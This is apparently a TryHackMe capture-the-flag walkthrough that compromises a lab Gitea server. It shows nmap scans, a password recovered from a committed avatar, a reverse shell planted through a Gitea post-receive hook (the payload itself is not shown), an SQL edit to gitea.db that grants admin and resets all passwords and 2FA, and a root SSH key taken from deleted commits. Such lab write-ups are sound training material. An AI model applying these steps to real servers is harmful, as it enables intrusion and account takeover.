Ahhhhh man so we are doing THM today it been long i know we try my possible best to keep upating the THM writeups without wasting to much of time let jump in already so the fun can begin.
We always start with an nmap scan…..
nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.84.166
# Nmap 7.91 scan initiated Fri Feb 18 07:49:36 2022 as: nmap -p- --min-rate 10000 -oN nmap/full.tcp -v 10.10.84.166
Increasing send delay for 10.10.84.166 from 0 to 5 due to 11 out of 18 dropped probes since last increase.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8399426 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8399426 microseconds. Ignoring time.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
adjust_timeouts2: packet supposedly had rtt of 8037721 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 8037721 microseconds. Ignoring time.
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.84.166
Host is up (4.3s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9090/tcp closed zeus-admin
Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 18 07:55:24 2022 -- 1 IP address (1 host up) scanned in 347.80 seconds
No we know we have just 2 open ports let throw in some service detection and default nmap scripts to know what we are dealing with but we already know 22 is SSH and 80 is HTTP but no hard feeling in trying it.
nmap -sC -sV -oN nmap/normal.tcp -p 22,80 10.10.84.166
# Nmap 7.91 scan initiated Fri Feb 18 07:57:10 2022 as: nmap -sC -sV -oN nmap/normal.tcp -p 22,80 10.10.84.166
Nmap scan report for 10.10.84.166
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http nginx
| http-title: Hello, World
|_Requested resource was http://10.10.84.166/index.html
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb 18 07:58:53 2022 -- 1 IP address (1 host up) scanned in 103.06 seconds
Now more better let check what we have on HTTP.
But strange just by opening the IP we got redirected to youtube damn we just got rickroll XD let use curl and see what we have in the source.
Now let add that to our /etc/hosts file.
Now that is cool we have a gitea when i try checking for version seems it hidden let try and register.
Now we hit on sign up and boom boom.
Now let click on Explore to see what we have.
We have two repos let see what we can dig out in the deleted commits it always cool to check that.
Five commits now that should be interesting everybody likes commits XD.
Now that is interesting but who does that hidding Password in an avatar ahhhh let confirm it.
So i downloaded it on my target to confirm if scones is right about his password gotten hidden in an avatar.
Now that should be easy seems scones password is Password ahhhhhh let confirm it.
Boom we are in going through hydra repo and found nothing but seems the version of the gitea is hidden why not check if we have Git Hooks enabled which should be possible to get RCE, how do you know?? WTF have some dignity and do some research XD lol just kidding.
Which was publish back in 2021, February got the exploit code but i decided to do it manully to know what am doing.
Now let click on settings >> Git Hooks >> post-receive .
So let add our reverse shell payload and update the hooks .
Now let move to the next step let start our ncat listener and make a commit to trigger our payload.
touch shell.md
git init
git add shell.md
git commit -m "Initial commit"
git remote add origin http://git.git-and-crumpets.thm/scones/cant-touch-this.git
git push -u origin master --force
So we add scones and Password to push the commit which trigger the payload and boom we have a reverse shell. Let spawn a full tty shell.
Now let get the user.txt in the home directory.
Privilege Escalation
Going through directories the only promising one is /var/lib/gitea/data we found gitea.db let check what we have on it using sqlite3 .
Now let type sqlite3 to open the db file.
Boom let drop the user table.
we know user scones is not an admin on gitea but since we have all permission to the gitea.db we can change all users to admin or change each users password let do that now.
select lower_name, is_admin from user;
Only hydra have access has admin we can easily change scones ID to 1 which he will also have admin privilege let update that now.
UPDATE user SET is_admin=1 WHERE lower_name="scones";
Now let log back in to gitea .
We are admin now time to reset all users Password .
Now i added new password for each users and reset 2FA also XD.
Now let click on update user account and we should be good i do it for all users. we should get user account has been updated.
Now we can easily use the password to access each account to check there commits i firstly go for user hydra but got nothing on the commits let check user root now.
Boom we got a backup repo with some pushed and deleted commits but the ssh with a password i guess caught my eyes let check it out.
Four commits let click on it and see what we have in store for us.
Ahhhhhhhh awesome let see what we have on the ssh .
Boom we found a private key ahhhhhh finally some progress i quickly copy and save it on my attacking machine let try using it with the root user on SSH.
Boom we are root and done for the private key password you already know it Sup3rS3**** just look close and that all.
Greeting From Muzec